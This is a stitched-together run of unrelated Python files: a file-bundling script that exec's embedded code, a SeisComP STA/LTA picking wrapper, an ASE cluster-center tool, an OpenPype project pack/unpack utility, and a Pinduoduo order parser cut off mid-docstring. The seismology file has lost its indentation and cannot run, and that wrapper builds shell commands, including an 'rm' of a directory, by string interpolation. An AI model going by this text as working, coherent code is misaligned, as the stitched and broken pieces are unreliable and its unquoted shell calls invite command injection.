        'exec __FILES[".SELF/%s"] in sys.modules["%s"].__dict__' % (fn, bn),
        ''
    ])
    return '\n'.join(text)
def breed_text(fn, compress=False):
    """Embed a text file into the combined script's __FILES map."""
    pre, lines, post = format_snake(fn, compress=compress)
    header = '__FILES[".SELF/%s"] = %s' % (fn, pre)
    return '\n'.join([header] + lines + [post])
def breed_binary(fn, compress=False):
    """Embed a binary file (base64-encoded) into the combined script's __FILES map."""
    pre, lines, post = format_snake(fn, compress=compress, binary=True)
    header = '__FILES[".SELF/%s"] = %s' % (fn, pre)
    return '\n'.join([header] + lines + ['%s\n' % post])
def breed_gtk_image(fn):
    # Embed an image twice: its raw bytes under the filename, and a ready-made
    # gtk.gdk.Pixbuf constructor expression under "<filename>:GTK" for use by
    # gtk_open_image() in the preamble.  Requires gtk to be importable.
    img = gtk.Image()
    img.set_from_file(fn)
    pb = img.get_pixbuf()
    lines = br79(base64.b64encode(zlib.compress(pb.get_pixels(), 9)))
    data = '\n'.join(lines)
    text = [breed_binary(fn).strip(),
            ('__FILES[".SELF/%s:GTK"] = gtk.gdk.pixbuf_new_from_data(\n %s)'
             ) % (fn, ', '.join([str(p) for p in [
                 'zlib.decompress(__b64d("""\\\n%s"""\n ))' % data,
                 '\n gtk.gdk.COLORSPACE_RGB',
                 pb.get_has_alpha(),
                 pb.get_bits_per_sample(),
                 pb.get_width(),
                 pb.get_height(),
                 pb.get_rowstride()
             ]])), '']
    return '\n'.join(text)
def breed_dir(dn, main, smart=True, gtk_images=False, compress=False):
    # Recursively embed a directory.  Ordering matters for module init:
    # __init__.py must run first, __main__.py (if wanted) last.
    files = [f for f in os.listdir(dn) if not f.startswith('.')]
    text = []
    # Make sure __init__.py is FIRST.
    if '__init__.py' in files:
        files.remove('__init__.py')
        files[0:0] = ['__init__.py']
    # Make sure __main__.py is either excluded, or LAST
    if '__main__.py' in files:
        files.remove('__main__.py')
        if main: files.append('__main__.py')
    for fn in files:
        ismain = (main and fn == files[-1])
        fn = os.path.join(dn, fn)
        # BUG FIX: the recursive call previously hard-coded smart=True, which
        # silently ignored the caller's smart flag.
        bred = breed(fn, ismain,
                     smart=smart, gtk_images=gtk_images, compress=compress)
        if bred: text.append(bred)
    return ('\n%s\n' % BREEDER_DIVIDER).join(text)
# Extensions never embedded when smart filtering is on.
EXCL = ('pyc', 'tmp', 'bak')

def breed(fn, main, smart=True, gtk_images=False, compress=False):
    """Embed *fn* (file or directory), dispatching on its extension."""
    if '"' in fn or '\\' in fn:
        raise ValueError('Cannot handle " or \\ in filenames')
    if os.path.isdir(fn):
        return breed_dir(fn, main,
                         smart=smart, gtk_images=gtk_images, compress=compress)
    ext = fn.split('.')[-1].lower()
    if smart and ext in EXCL:
        return ''
    if ext in ('py', 'pyw'):
        return breed_python(fn, main, gtk_images=gtk_images, compress=compress)
    if ext in ('txt', 'md', 'html', 'css', 'js', 'pk-shtml'):
        return breed_text(fn, compress=compress)
    if gtk_images and ext in ('gif', 'png', 'jpg', 'jpeg'):
        return breed_gtk_image(fn)
    return breed_binary(fn, compress=compress)
if __name__ == '__main__':
    # NOTE: Python 2 entry point (print statements; emitted preamble is py2).
    gtk_images = compress = False
    header = BREEDER_NOTE
    args = sys.argv[1:]
    if '--gtk-images' in args:
        import gobject, gtk
        gtk_images = True
        args.remove('--gtk-images')
    if '--compress' in args:
        compress=True
        args.remove('--compress')
    if '--header' in args:
        # --header FILE replaces the default breeder note at the top.
        header = ''.join(open(args.pop(args.index('--header')+1), 'r').readlines())
        args.remove('--header')
    # The last argument is treated as the __main__ file of the bundle.
    print BREEDER_PREAMBLE % header.strip()
    if gtk_images:
        print BREEDER_GTK_PREAMBLE
    for fn in args:
        print BREEDER_DIVIDER
        print breed(fn, (fn == args[-1]), gtk_images=gtk_images, compress=compress)
        print
    print BREEDER_POSTAMBLE
|
# -*- coding: utf-8 -*-
"""
Classes and functions to compute sta/lta in seiscomp3
Created on Jul 20 2021
@author: <NAME>, <EMAIL>
"""
#from obspy import read, UTCDateTime
import obspy
import os
import xml.etree.ElementTree as ET
import pandas as pd
from obspy.core import UTCDateTime
import numpy as np
from concurrent.futures import ProcessPoolExecutor
from icecream import ic
ic.configureOutput(prefix='debug| ') # , includeContext=True)
class StaLta:
times_file: str
picks_dir: str
inv_xml: str
_debug: bool
best_p_csv = 'results_P.csv'
main_dir: str = os.path.dirname(os.path.realpath(__file__))
def __init__(self):
self.__dict__.update(self._current_exc_params)
@property
def best_p_params(self):
"""
Get the best p parameters
"""
df = pd.read_csv(self.best_p_csv)
# selecting the row with net.sta equal to CM.BAR2 and with the highest value of best_f1
p_best = df[df['net.sta'] == f'{self.net}.{self.sta}'].sort_values(by='best_f1', ascending=False).iloc[0].to_dict()
return p_best
@property
def _current_exc_params(self):
"""function that reads from a file called current_exc.txt
the values of times_paths['P'] or times_paths['S'], picks_dir, inv_xml, and debug
"""
f = open('current_exc.txt', 'r')
lines = f.readlines()
f.close()
dic = {}
for line in lines:
line = line.strip('\n').strip(' ')
key, value = line.split('=')
dic[key.strip()] = value.strip()
return dic
@property
def debug(self):
return True if self._debug in ['true', 'True', 'TRUE'] else False
@property
def times_file_name(self):
return os.path.basename(self.times_file)
@property
def station_name(self):
return self.times_file_name.split('_')[0]
@property
def phase(self):
return ic(self.times_file_name.split('_')[-2])
@property
def lines(self):
return open(self.times_file, 'r').readlines()
@property
def N(self):
return len(self.lines)
@property
def max_workers(self):
"""
Get the maximum number of workers if debug is false
"""
if self.debug:
return 1
else:
return int(os.cpu_count() * 1)
def mega_sta_lta(self, **kwargs):
"""
Compute sta/lta for all lines in the file
"""
kwargs.update(self._current_exc_params)
self.remove_picks_dir()
self.edit_xml_config(**kwargs)
Y_obs_ = []
Y_pred_ = []
"""for line in self.lines:
self.exc_read_transform(line)
Y_obs_.append(self.y_obs)
Y_pred_.append(self.y_pred)
Y_obs = np.concatenate(Y_obs_)
Y_pred = np.concatenate(Y_pred_)"""
# self.max_workers
# execute scautopick in parallel and saving the results in Y_obs and Y_pred
with ProcessPoolExecutor(max_workers=self.max_workers) as excecutor:
for y_obs, y_pred in excecutor.map(self.exc_read_transform, self.lines):
Y_obs_.append(y_obs)
Y_pred_.append(y_pred)
Y_obs = np.concatenate(Y_obs_)
Y_pred = np.concatenate(Y_pred_)
ic(Y_obs)
ic(Y_pred)
ic(np.unique(Y_obs))
ic(np.unique(Y_pred))
# plot if debug is true
if self.debug:
self.test_binary_times(Y_obs, Y_pred)
return Y_obs, Y_pred
def exc_read_transform(self, line):
self.sta_lta_compute(line)
try:
# get pick times
self.pick_times = XMLPicks(self.pick_path, self.phase).get_pick_times()
except TypeError:
ic()
# if no pick is found, set pick times to empty list
self.pick_times = []
except KeyError:
ic()
self.pick_times = []
# transform predicted times into a binary time series
y_pred = BinaryTransform(self.wf_start_time,
self.sample_rate,
self.npts,
self.pick_times).transform()
y_obs = BinaryTransform(self.wf_start_time,
self.sample_rate,
self.npts,
self.ph_time).transform()
if self.debug:
self.test_binary_time(y_pred)
return y_obs, y_pred
def time2sample(self, time: UTCDateTime):
"""
Convert a time into a sample
"""
return int((time - self.wf_start_time) * self.sample_rate)
def test_binary_times(self, y_obs, y_pred):
import matplotlib.pyplot as plt
plt.figure()
plt.plot(y_obs, label='Y_obs')
plt.plot(y_pred, "--r", label='Y_pred')
plt.legend()
plt.show()
def test_binary_time(self, y_pred):
import obspy as obs
import matplotlib.pyplot as plt
st = obs.read(self.wf_path)
tr = st[0]
# getting the pick times in counts of samples
tc = [self.time2sample(t) for t in self.pick_times]
plt.figure(figsize=(8, 4))
plt.subplot(211)
plt.plot(tr.data, color='k', lineWidth=0.5)
plt.vlines(tc, -5000, 5000, color='r', zorder=10)
plt.legend(['waveform', 'predicted picks'])
plt.title(f'{self.station_name} {self.phase}')
plt.xticks([])
plt.ylabel('Amplitude')
plt.subplot(212)
plt.plot(y_pred)
plt.show()
def remove_picks_dir(self):
"""
Remove the picks directory content if it exists
"""
if os.path.exists(self.picks_dir):
os.system(f'rm {self.picks_dir}/*')
def sta_lta_compute(self, line: str):
"""
Compute sta/lta for a single line
"""
fields = line.split(',')
self.ph_time = [obspy.UTCDateTime(fields[1].strip("\n\r"))]
# get the initial waveform time
self.wf_start_time = obspy.UTCDateTime(fields[2].strip("\n\r"))
# get the sample rate
self.sample_rate = float(fields[3].strip("\n\r"))
# get the number of samples
self.npts = int(fields[4].strip("\n\r"))
self.wf_path = fields[0]
self.run_scautopick()
@property
def xml_exc_name(self):
return f'exc_{self.station_name}_{self.phase}.xml'
def edit_xml_config(self, **kwargs):
"""
Edit the config.xml file
"""
if self.phase == 'P':
xml_filename = 'config_template_P.xml'
kwargs['p_fmax'] = kwargs['p_fmin'] + kwargs['p_fwidth']
kwargs['p_lta'] = kwargs['p_sta'] + kwargs['p_sta_width']
kwargs['aic_fmax'] = kwargs['aic_fmin'] + kwargs['aic_fwidth']
else:
xml_filename = 'config_template.xml'
kwargs['p_fmax'] = kwargs['p_fmin'] + kwargs['p_fwidth']
kwargs['p_lta'] = kwargs['p_sta'] + kwargs['p_sta_width']
kwargs['aic_fmax'] = kwargs['aic_fmin'] + kwargs['aic_fwidth']
kwargs['s_fmax'] = kwargs['s_fmin'] + kwargs['s_fwidth']
ic(xml_filename)
# xml path for the template
xml_path = os.path.join(self.main_dir, 'bindings', xml_filename)
xml_str = open(xml_path, 'r').read()
# xml path for the excecution of scautopick
self.xml_exc_path = os.path.join(os.getcwd(), self.xml_exc_name)
# Edit the config.xml file
with open(self.xml_exc_path, 'w') as f:
f.write(ic(xml_str.format(**kwargs)))
    def run_scautopick(self):
        """
        Run scautopick

        Builds and executes the SeisComP ``scautopick`` command in playback
        mode, redirecting its event-parameters XML output into
        ``self.pick_path``.
        """
        # Optional verbose flag appended to the command line.
        debug_line = ' --debug' if self.debug else ''
        # Run scautopick
        # NOTE(review): the command is assembled by string interpolation and
        # executed through the shell; paths containing spaces or shell
        # metacharacters would break it. Consider subprocess.run with an
        # argument list -- left unchanged here.
        cmd = f'scautopick -I {self.wf_path} --config-db {self.xml_exc_path}'
        cmd += f' --amplitudes 0 --inventory-db {self.inv_xml}'
        cmd += f' --playback --ep{debug_line}>{self.pick_path}'
        ic(cmd)
        os.system(cmd)
@property
def picks_name(self):
"""
Return the name of the pick file
"""
return os.path.basename(self.wf_path).split('.')[0] + '_picks.xml'
@property
def pick_path(self):
return os.path.join(self.picks_dir, self.picks_name)
class XMLPicks:
    """Reader for SeisComP pick XML files.

    Extracts automatic pick times for a given phase from an
    event-parameters XML document (seiscomp3 schema 0.11).
    """
    xml_path: str
    ns: dict = {'seiscomp': 'http://geofon.gfz-potsdam.de/ns/seiscomp3-schema/0.11'}

    def __init__(self, xml_path: str, phase: str):
        self.xml_path = xml_path
        self.phase = phase

    def open_dict_time(self, x):
        # Extract the 'value' entry of a time mapping
        # (kept for backward compatibility with external callers).
        return x['value']

    def get_pick_times(self):
        """
        Return automatic pick times from an xml file

        Only picks whose ``phaseHint`` matches ``self.phase`` are returned,
        as a list of ``obspy.UTCDateTime`` objects.
        """
        # NOTE: a dead, commented-out pandas-based alternative implementation
        # that previously followed this method was removed.
        times = []
        root = ET.parse(self.xml_path).getroot()
        for pick in root.findall('seiscomp:EventParameters/seiscomp:pick', self.ns):
            if self.phase == pick.find('seiscomp:phaseHint', self.ns).text:
                time = pick.find('seiscomp:time/seiscomp:value', self.ns).text
                ic(time)
                times.append(obspy.UTCDateTime(time))
        return times
class BinaryTransform:
    """
    Transform pick times into a binary time series

    Each pick marks a window of +/- ``unc`` seconds with ones in an
    otherwise zero array of length ``npts``.
    """
    # Half-width (seconds) of the window marked 1 around each pick.
    unc: float = 1.0

    def __init__(self, wf_start_time: "UTCDateTime", sample_rate: float,
                 npts: int, ph_times: list):
        self.wf_start_time = wf_start_time
        self.ph_times = ph_times
        self.sample_rate = sample_rate
        self.npts = npts

    def transform(self):
        """
        Transform pick times into a binary time series

        Returns a numpy array of length ``npts`` with ones inside
        +/- ``unc`` seconds of every pick and zeros elsewhere.
        """
        z = np.zeros(self.npts)
        if not self.ph_times:
            return z
        # transform pick times into a binary time series
        for ph_time in self.ph_times:
            # get the sample points for the phase time +/- uncertainty
            n_ph_i, n_ph_f = self.phase_point(ph_time,
                                              self.wf_start_time,
                                              self.sample_rate,
                                              self.unc)
            # Bug fix: a pick close to the trace start yields negative
            # indices; an unclamped negative slice start wraps around and
            # marks the wrong samples (or nothing at all). Clamp both ends
            # to 0; the upper end is clamped to npts by slicing itself.
            z[max(n_ph_i, 0):max(n_ph_f, 0)] = 1
        return z

    def phase_point(self, t, ti, df, unc):
        """Return (first, last) sample indices of the interval t +/- unc
        relative to the trace start time ti, at sampling rate df.
        (Original docstring: "Calcula los extremos de un intervalo de
        puntos del tiempo ingresado".)"""
        t_r_p_i = t-ti-unc
        t_r_p_f = t-ti+unc
        n_p_i = int(t_r_p_i*df)
        n_p_f = int(t_r_p_f*df)
        return n_p_i, n_p_f
|
"""Locate the position of a cluster (its center of mass) in a simulation.
The module calculates the center of mass of a connected cluster of atoms,
even in the case where the cluster straddles the periodic boundaries. It
is OK that there are other atoms not connected to the cluster, as long
as the atom with the highest coordination number is part of the cluster,
or an atom being part of the cluster is specified manually.
"""
from asap3 import FullNeighborList
import numpy as np
import sys
from ase.io import PickleTrajectory, BundleTrajectory
class ClusterCenter:
    # Flood-fills a connected cluster through the neighbor list, accumulating
    # a mass-weighted position sum so that periodic images are unwrapped via
    # relative neighbor displacements.
    def __init__(self, cutoff=3.0):
        # cutoff: neighbor-list distance (presumably Angstrom, as usual for
        # ASE/asap3 -- confirm against the simulation units).
        self.nblist = FullNeighborList(cutoff)

    def calculate_center(self, atoms, startatom=None):
        """Calculate the center of mass position of a cluster of atoms.
        An atom belonging to the cluster can optionally be specified, if
        not specified one of the highest coordinated atoms is used.

        Returns a length-3 position vector (sum(m_i * r_i) / sum(m_i)).
        """
        natoms = len(atoms)
        self.nblist.check_and_update(atoms)
        if startatom is None:
            # Pick the most-coordinated atom: very likely inside the cluster.
            coordnum = [len(self.nblist[i]) for i in range(natoms)]
            startatom = np.argmax(coordnum)
        # Accumulators filled by the recursive traversal below.
        self.cluster = []
        self.sumpos = np.zeros(3)
        self.summass = 0
        self.isincluster = np.zeros(natoms, bool)
        self.masses = atoms.get_masses()
        self.add_atom_to_cluster(startatom, atoms[startatom].position)
        com = self.sumpos / self.summass
        return com

    def add_atom_to_cluster(self, n, pos):
        "Add an atom and all its neighbors to the cluster."
        # NOTE(review): this recursion is one frame per cluster atom; a very
        # large cluster could hit Python's recursion limit -- confirm typical
        # cluster sizes before relying on this.
        self.isincluster[n] = True
        self.sumpos += pos * self.masses[n]
        self.summass += self.masses[n]
        neighbors, reldists, sqdists = self.nblist.get_neighbors(n)
        for i, relpos in zip(neighbors, reldists):
            if not self.isincluster[i]:
                # Add neighboring atom to cluster, using the relative
                # position so periodic boundaries are handled correctly.
                self.add_atom_to_cluster(i, pos + relpos)

    def calculate_from_trajectory(self, traj, startatom=None, selector=None):
        """Calculate the center of mass for a cluster in a trajectory file.
        traj: The trajectory object, or a file name.
        startatom (optional): Specifies an atom guaranteed to be in the cluster.
        If not specified, the atom with the highest coordination number is
        used (if there is only one cluster this should work).
        selector (optional): A function defining which atoms should be
        considered. The function is called with one argument, the atoms
        object, and should either return an array of booleans, one per
        atom, indicating if they should be included, or return an array
        of integers interpreted as the indices of the atoms to be included.
        This can e.g. be used to select a cluster sitting on a substrate.
        This method returns an array of center-of-mass positions, one for each
        frame in the trajectory.
        """
        if isinstance(traj, str):
            # Accept file names, dispatching on the extension.
            if traj.endswith('.traj'):
                traj = PickleTrajectory(traj)
            elif traj.endswith('.bundle'):
                traj = BundleTrajectory(traj)
            else:
                raise ValueError("Cannot handle a file name not ending in .traj or .bundle: " + traj)
        result = []
        for atoms in traj:
            if selector is not None:
                # Boolean mask or index array -- both are valid ASE indices.
                idx = selector(atoms)
                atoms = atoms[idx]
            result.append(self.calculate_center(atoms, startatom))
        return result
if __name__ == '__main__':
    # Demo example: Track a cluster of Ni atoms on a surface of something else.
    def sel(a):
        # Keep only nickel atoms (atomic number 28).
        return np.equal(a.get_atomic_numbers(), 28)
    res = ClusterCenter().calculate_from_trajectory(sys.argv[1], selector=sel)
    # Bug fix: `print np.array(res)` is a Python 2 print statement and a
    # SyntaxError under Python 3; the call form below behaves identically
    # on both interpreters for a single argument.
    print(np.array(res))
|
<filename>openpype/lib/project_backpack.py
"""These lib functions are primarily for development purposes.
WARNING: This is not meant for production data.
Goal is to be able create package of current state of project with related
documents from mongo and files from disk to zip file and then be able recreate
the project based on the zip.
This gives ability to create project where a changes and tests can be done.
Keep in mind that to be able create a package of project has few requirements.
Possible requirement should be listed in 'pack_project' function.
"""
import os
import json
import platform
import tempfile
import shutil
import datetime
import zipfile
from bson.json_util import (
loads,
dumps,
CANONICAL_JSON_OPTIONS
)
from avalon.api import AvalonMongoDB
DOCUMENTS_FILE_NAME = "database"
METADATA_FILE_NAME = "metadata"
PROJECT_FILES_DIR = "project_files"
def add_timestamp(filepath):
    """Insert a `_yymmdd_HHMMSS` timestamp between a file's base name and
    its extension, returning the new path."""
    base, ext = os.path.splitext(filepath)
    stamp = datetime.datetime.now().strftime("%y%m%d_%H%M%S")
    return "{}_{}{}".format(base, stamp, ext)
def pack_project(project_name, destination_dir=None):
    """Make a package of a project with mongo documents and files.
    This function has few restrictions:
    - project must have only one root
    - project must have all templates starting with
    "{root[...]}/{project[name]}"
    Args:
    project_name(str): Project that should be packaged.
    destination_dir(str): Optinal path where zip will be stored. Project's
    root is used if not passed.

    Raises:
        ValueError: When the project does not exist, has multiple roots,
            or its files cannot be found on disk.
    """
    print("Creating package of project \"{}\"".format(project_name))
    # Validate existence of project
    dbcon = AvalonMongoDB()
    dbcon.Session["AVALON_PROJECT"] = project_name
    project_doc = dbcon.find_one({"type": "project"})
    if not project_doc:
        raise ValueError("Project \"{}\" was not found in database".format(
            project_name
        ))
    roots = project_doc["config"]["roots"]
    # Determine root directory of project
    source_root = None
    source_root_name = None
    for root_name, root_value in roots.items():
        # A second iteration means more than one root -> unsupported layout.
        if source_root is not None:
            raise ValueError(
                "Packaging is supported only for single root projects"
            )
        source_root = root_value
        source_root_name = root_name
    # Root values are per-platform mappings; pick the current platform.
    root_path = source_root[platform.system().lower()]
    print("Using root \"{}\" with path \"{}\"".format(
        source_root_name, root_path
    ))
    project_source_path = os.path.join(root_path, project_name)
    if not os.path.exists(project_source_path):
        raise ValueError("Didn't find source of project files")
    # Determine zip filepath where data will be stored
    if not destination_dir:
        destination_dir = root_path
    destination_dir = os.path.normpath(destination_dir)
    if not os.path.exists(destination_dir):
        os.makedirs(destination_dir)
    zip_path = os.path.join(destination_dir, project_name + ".zip")
    print("Project will be packaged into \"{}\"".format(zip_path))
    # Rename already existing zip
    if os.path.exists(zip_path):
        dst_filepath = add_timestamp(zip_path)
        os.rename(zip_path, dst_filepath)
    # We can add more data
    metadata = {
        "project_name": project_name,
        "root": source_root,
        "version": 1
    }
    # Create temp json file where metadata are stored
    # (delete=False so the file survives the context exit and can be
    # reopened by name; it is removed explicitly at the end).
    with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as s:
        temp_metadata_json = s.name
    with open(temp_metadata_json, "w") as stream:
        json.dump(metadata, stream)
    # Create temp json file where database documents are stored
    with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as s:
        temp_docs_json = s.name
    # Query all project documents and store them to temp json
    docs = list(dbcon.find({}))
    # bson's extended-JSON dump keeps ObjectIds/dates round-trippable.
    data = dumps(
        docs, json_options=CANONICAL_JSON_OPTIONS
    )
    with open(temp_docs_json, "w") as stream:
        stream.write(data)
    print("Packing files into zip")
    # Write all to zip file
    with zipfile.ZipFile(zip_path, "w", zipfile.ZIP_DEFLATED) as zip_stream:
        # Add metadata file
        zip_stream.write(temp_metadata_json, METADATA_FILE_NAME + ".json")
        # Add database documents
        zip_stream.write(temp_docs_json, DOCUMENTS_FILE_NAME + ".json")
        # Add project files to zip
        for root, _, filenames in os.walk(project_source_path):
            for filename in filenames:
                filepath = os.path.join(root, filename)
                # TODO add one more folder
                # Archive paths are stored relative to the root so unpack
                # can relocate the project under a different root.
                archive_name = os.path.join(
                    PROJECT_FILES_DIR,
                    os.path.relpath(filepath, root_path)
                )
                zip_stream.write(filepath, archive_name)
    print("Cleaning up")
    # Cleanup
    os.remove(temp_docs_json)
    os.remove(temp_metadata_json)
    dbcon.uninstall()
    print("*** Packing finished ***")
def unpack_project(path_to_zip, new_root=None):
    """Unpack project zip file to recreate project.
    Args:
    path_to_zip(str): Path to zip which was created using 'pack_project'
    function.
    new_root(str): Optional way how to set different root path for unpacked
    project.

    WARNING: drops any existing mongo collection with the project's name
    before re-inserting the packaged documents.
    """
    print("Unpacking project from zip {}".format(path_to_zip))
    if not os.path.exists(path_to_zip):
        print("Zip file does not exists: {}".format(path_to_zip))
        return
    tmp_dir = tempfile.mkdtemp(prefix="unpack_")
    print("Zip is extracted to temp: {}".format(tmp_dir))
    with zipfile.ZipFile(path_to_zip, "r") as zip_stream:
        zip_stream.extractall(tmp_dir)
    # Metadata written by pack_project (project name, root, version).
    metadata_json_path = os.path.join(tmp_dir, METADATA_FILE_NAME + ".json")
    with open(metadata_json_path, "r") as stream:
        metadata = json.load(stream)
    docs_json_path = os.path.join(tmp_dir, DOCUMENTS_FILE_NAME + ".json")
    with open(docs_json_path, "r") as stream:
        content = stream.readlines()
    # bson extended-JSON load restores ObjectIds/dates.
    docs = loads("".join(content))
    low_platform = platform.system().lower()
    project_name = metadata["project_name"]
    source_root = metadata["root"]
    root_path = source_root[low_platform]
    # Drop existing collection
    dbcon = AvalonMongoDB()
    database = dbcon.database
    if project_name in database.list_collection_names():
        database.drop_collection(project_name)
        print("Removed existing project collection")
    print("Creating project documents ({})".format(len(docs)))
    # Create new collection with loaded docs
    collection = database[project_name]
    collection.insert_many(docs)
    # Skip change of root if is the same as the one stored in metadata
    if (
        new_root
        and (os.path.normpath(new_root) == os.path.normpath(root_path))
    ):
        new_root = None
    if new_root:
        print("Using different root path {}".format(new_root))
        root_path = new_root
        # Patch the (single) root of the freshly inserted project document
        # for the current platform only.
        project_doc = collection.find_one({"type": "project"})
        roots = project_doc["config"]["roots"]
        key = tuple(roots.keys())[0]
        update_key = "config.roots.{}.{}".format(key, low_platform)
        collection.update_one(
            {"_id": project_doc["_id"]},
            {"$set": {
                update_key: new_root
            }}
        )
    # Make sure root path exists
    if not os.path.exists(root_path):
        os.makedirs(root_path)
    src_project_files_dir = os.path.join(
        tmp_dir, PROJECT_FILES_DIR, project_name
    )
    dst_project_files_dir = os.path.normpath(
        os.path.join(root_path, project_name)
    )
    # Never overwrite an existing project folder; park it with a timestamp.
    if os.path.exists(dst_project_files_dir):
        new_path = add_timestamp(dst_project_files_dir)
        print("Project folder already exists. Renamed \"{}\" -> \"{}\"".format(
            dst_project_files_dir, new_path
        ))
        os.rename(dst_project_files_dir, new_path)
    print("Moving project files from temp \"{}\" -> \"{}\"".format(
        src_project_files_dir, dst_project_files_dir
    ))
    shutil.move(src_project_files_dir, dst_project_files_dir)
    # CLeanup
    print("Cleaning up")
    shutil.rmtree(tmp_dir)
    dbcon.uninstall()
    print("*** Unpack finished ***")
|
<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import requests
from bs4 import BeautifulSoup
import re
import json
import yaml
def get_domain():
    """Return the base URL of the Pinduoduo mobile site."""
    domain = "http://mobile.yangkeduo.com/"
    return domain
class PingDuoDuoGood:
    """A single goods entry of a Pinduoduo order."""

    def __init__(self, _good_name="", _good_number="", _good_price="", _good_link_url=""):
        self.goods_name = _good_name
        self.goods_price = _good_price
        self.goods_number = _good_number
        self.goods_link_url = _good_link_url

    def to_string(self):
        """Render as "<name> <count>件 <price>"."""
        pieces = [self.goods_name, " ", str(self.goods_number), "件 ", str(self.goods_price)]
        return "".join(pieces)

    def parse(self, data):
        """Fill the fields from an order-goods dict; returns self."""
        if data is None:
            return self
        self.goods_name = get_not_none(data, "goods_name", "")
        self.goods_number = get_not_none(data, "goods_number", 0)
        self.goods_price = get_not_none(data, "goods_price", 0)
        return self
def pares(data):
    """Parse every entry of data["orders"] into an OrderInfo.

    NOTE(review): the name looks like a typo of "parse" but is kept for
    backward compatibility with existing callers.

    Bug fix: the parsed OrderInfo objects were previously built and
    immediately discarded; they are now collected and returned (callers
    that ignored the old None return are unaffected). A missing or None
    "orders" key no longer raises and yields an empty list.
    """
    parsed = []
    orders = data.get("orders")
    if orders is not None:
        for order in orders:
            order_info = OrderInfo()
            order_info.parse(order)
            parsed.append(order_info)
    return parsed
def get_not_none(data, key, default=""):
    """Return data[key] when present and not None, otherwise default."""
    value = data.get(key)
    if value is None:
        return default
    return value
def get_int_not_none(data, key, default=0):
    """Return data[key] when present and not None, otherwise default.

    NOTE(review): despite the name, no int() coercion is performed; the
    stored value is returned unchanged (matching existing callers).
    """
    value = data.get(key)
    if value is None:
        return default
    return value
def get_good_count(data):
    """Return the second whitespace-separated token of data ("" on failure).

    Presumably data looks like "<name> <count> ..." and the count field is
    wanted -- confirm against the caller. The bare `except:` was narrowed to
    the two failures this parse can actually raise: non-string input
    (AttributeError) and too few tokens (IndexError).
    """
    try:
        return data.split()[1]
    except (AttributeError, IndexError):
        return ""
def get_good_price(data):
    """Parse the price (third token of the first line, in cents) and return
    it in yuan as a string; "" when the field is missing or not numeric.

    The bare `except:` was narrowed: IndexError for a short token list,
    ValueError for a non-numeric price. A non-string argument still raises,
    as it did outside the original try block.
    """
    first = data.split("\n")[0]
    try:
        price = (first.split())[2]
        return str(float(price) / 100)
    except (IndexError, ValueError):
        return ""
def get_good_info(data):
    """Return the first whitespace-separated token of data ("" on failure).

    The bare `except:` was narrowed to the failures the expression can
    raise: non-string input (AttributeError) and an empty/whitespace-only
    string (IndexError).
    """
    try:
        return data.split()[0]
    except (AttributeError, IndexError):
        return ""
class MallInfo:
    """Shop (mall) metadata attached to an order."""

    def __init__(self, _id="", _mall_name="", _mall_url=""):
        self.id = _id
        self.mall_name = _mall_name
        self.mall_url = _mall_url

    def parse(self, data):
        """Populate the fields from a mall dict; returns self."""
        if data is None:
            return self
        self.id = get_not_none(data, "id")
        self.mall_name = get_not_none(data, "mall_name")
        # Stored URL is site-relative; prefix the mobile-site domain.
        self.mall_url = get_domain() + get_not_none(data, "mall_url")
        return self
class OrderInfo:
    # Summary of one order as returned by the order-list API.
    def __init__(self):
        self.order_sn = ""
        self.order_status = 0
        self.pay_status = 0
        self.shipping_time = 0
        self.order_time = 0
        self.receive_time = 0
        self.expect_auto_receive_time = 0
        self.order_link_url = ""
        self.mall_info = MallInfo()
        self.express_id = ""
        self.order_goods = []
        self.order_status_str = ""
        self.shipping_status = 0
    def parse(self, data):
        """Populate all fields from an order dict of the list API; returns self.

        Missing/None values fall back to "" (strings) or 0 (numbers) via the
        module-level get_not_none/get_int_not_none helpers.
        """
        self.order_sn = get_not_none(data, "order_sn")
        self.order_status = get_int_not_none(data, "order_status", 0)
        self.pay_status = get_int_not_none(data, "pay_status", 0)
        self.shipping_time = get_int_not_none(data, "shipping_time", 0)
        self.order_time = get_int_not_none(data, "order_time", 0)
        self.receive_time = get_int_not_none(data, "receive_time", 0)
        self.expect_auto_receive_time = get_int_not_none(data, "expect_auto_receive_time", 0)
        self.order_link_url = get_not_none(data, "order_link_url")
        self.mall_info = MallInfo().parse(data.get("mall"))
        self.express_id = get_not_none(data, "tracking_number")
        self.order_status_str = get_not_none(data, "order_status_prompt")
        self.shipping_status = get_int_not_none(data, "shipping_status", 0)
        order_goods = data.get("order_goods")
        # Goods are stored as pre-rendered display strings, not objects.
        self.order_goods = []
        if order_goods is not None:
            for goods in order_goods:
                goods_info = PingDuoDuoGood().parse(goods)
                self.order_goods.append(goods_info.to_string())
        return self
    def get_order_goods(self):
        # One goods description per line.
        return "\n".join(self.order_goods)
def convert_status_code_status(code):
    """Map an order-status code to its Chinese label; unknown codes map to ""."""
    labels = {
        1: "付款",
        2: "待发货",
        3: "收货",
        4: "评价",
        5: "取消",
        6: "退款",
        7: "其他",
    }
    return labels.get(code, "")
def convert_code_to_express(code):
    """Map a courier code to its Chinese courier name; unknown codes map to "".

    Also logs the incoming code. Bug fix: the original Python 2 print
    statement (`print "code = " + ...`) is a SyntaxError under Python 3;
    the call form below behaves identically on both interpreters for a
    single argument.
    """
    print("code = " + str(code))
    couriers = {
        1: "中通",
        2: "邮政",
        3: "圆通",
        4: "申通",
        5: "顺丰",
        6: "韵达",
        7: "百世",
        8: "天天",
        9: "其他",
    }
    return couriers.get(code, "")
class DetailInfo:
    """Detailed order information scraped from the order-detail page."""

    @staticmethod
    def get_not_none(data, key, default=""):
        """Return data[key] when present and not None, otherwise default."""
        value = data.get(key)
        return value if value is not None else default

    def __init__(self, _order_id="",
                 _pay_way="",
                 _snapshot="",
                 _buy_time="",
                 _send_type="",
                 _express="",
                 _express_id="",
                 _send_time="",
                 _goods="",
                 _mall_id=0,
                 _mall_name="",
                 _mall_url="",
                 _receive_name="",
                 _mobile="",
                 _address=""):
        self.order_id = _order_id
        self.pay_way = _pay_way
        self.snapshot = _snapshot
        self.buy_time_str = _buy_time
        # Bug fix: _send_type was accepted but never stored.
        self.send_type = _send_type
        self.express = _express
        self.express_id = _express_id
        self.send_time_str = _send_time
        self.goods = _goods
        self.goods_list = []
        self.mall_id = _mall_id
        self.mall_name = _mall_name
        self.mall_url = _mall_url
        self.mobile = _mobile
        self.receive_name = _receive_name
        self.address = _address

    def parse_order_list(self, data):
        """Fill fields from the page's key/value description list.

